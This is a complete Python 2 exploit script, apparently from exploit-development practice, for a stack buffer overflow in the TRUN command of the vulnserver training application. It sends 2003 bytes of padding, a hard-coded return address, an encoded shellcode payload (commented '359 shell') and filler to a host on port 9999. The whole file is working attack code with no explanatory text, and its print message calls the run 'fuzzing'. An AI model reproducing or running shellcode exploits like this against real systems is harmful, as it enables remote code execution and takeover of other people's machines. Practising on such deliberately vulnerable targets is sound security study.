#! /usr/bin/python
import socket
import sys
#buffer 3000
#359 shell
buf = ""
buf += "\xb8\xd7\x9f\x2e\x96\xd9\xc7\xd9\x74\x24\xf4\x5b\x29"
buf += "\xc9\xb1\x52\x83\xc3\x04\x31\x43\x0e\x03\x94\x91\xcc"
buf += "\x63\xe6\x46\x92\x8c\x16\x97\xf3\x05\xf3\xa6\x33\x71"
buf += "\x70\x98\x83\xf1\xd4\x15\x6f\x57\xcc\xae\x1d\x70\xe3"
buf += "\x07\xab\xa6\xca\x98\x80\x9b\x4d\x1b\xdb\xcf\xad\x22"
buf += "\x14\x02\xac\x63\x49\xef\xfc\x3c\x05\x42\x10\x48\x53"
buf += "\x5f\x9b\x02\x75\xe7\x78\xd2\x74\xc6\x2f\x68\x2f\xc8"
buf += "\xce\xbd\x5b\x41\xc8\xa2\x66\x1b\x63\x10\x1c\x9a\xa5"
buf += "\x68\xdd\x31\x88\x44\x2c\x4b\xcd\x63\xcf\x3e\x27\x90"
buf += "\x72\x39\xfc\xea\xa8\xcc\xe6\x4d\x3a\x76\xc2\x6c\xef"
buf += "\xe1\x81\x63\x44\x65\xcd\x67\x5b\xaa\x66\x93\xd0\x4d"
buf += "\xa8\x15\xa2\x69\x6c\x7d\x70\x13\x35\xdb\xd7\x2c\x25"
buf += "\x84\x88\x88\x2e\x29\xdc\xa0\x6d\x26\x11\x89\x8d\xb6"
buf += "\x3d\x9a\xfe\x84\xe2\x30\x68\xa5\x6b\x9f\x6f\xca\x41"
buf += "\x67\xff\x35\x6a\x98\xd6\xf1\x3e\xc8\x40\xd3\x3e\x83"
buf += "\x90\xdc\xea\x04\xc0\x72\x45\xe5\xb0\x32\x35\x8d\xda"
buf += "\xbc\x6a\xad\xe5\x16\x03\x44\x1c\xf1\xec\x31\x1f\xc9"
buf += "\x85\x43\x1f\xd8\x0b\xcd\xf9\xb0\xa3\x9b\x52\x2d\x5d"
buf += "\x86\x28\xcc\xa2\x1c\x55\xce\x29\x93\xaa\x81\xd9\xde"
buf += "\xb8\x76\x2a\x95\xe2\xd1\x35\x03\x8a\xbe\xa4\xc8\x4a"
buf += "\xc8\xd4\x46\x1d\x9d\x2b\x9f\xcb\x33\x15\x09\xe9\xc9"
buf += "\xc3\x72\xa9\x15\x30\x7c\x30\xdb\x0c\x5a\x22\x25\x8c"
buf += "\xe6\x16\xf9\xdb\xb0\xc0\xbf\xb5\x72\xba\x69\x69\xdd"
buf += "\x2a\xef\x41\xde\x2c\xf0\x8f\xa8\xd0\x41\x66\xed\xef"
buf += "\x6e\xee\xf9\x88\x92\x8e\x06\x43\x17\xbe\x4c\xc9\x3e"
buf += "\x57\x09\x98\x02\x3a\xaa\x77\x40\x43\x29\x7d\x39\xb0"
buf += "\x31\xf4\x3c\xfc\xf5\xe5\x4c\x6d\x90\x09\xe2\x8e\xb1"

string = "A" * 2003 + "\xaf\x11\x50\x62" + buf + "C" * 454
try:
	print "Fuzzing vulnserver with %s" % len(string)
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connect=s.connect(('192.168.1.192',9999))
	s.send(('TRUN /.:/' + string))
	s.close()
except:
    print "failed"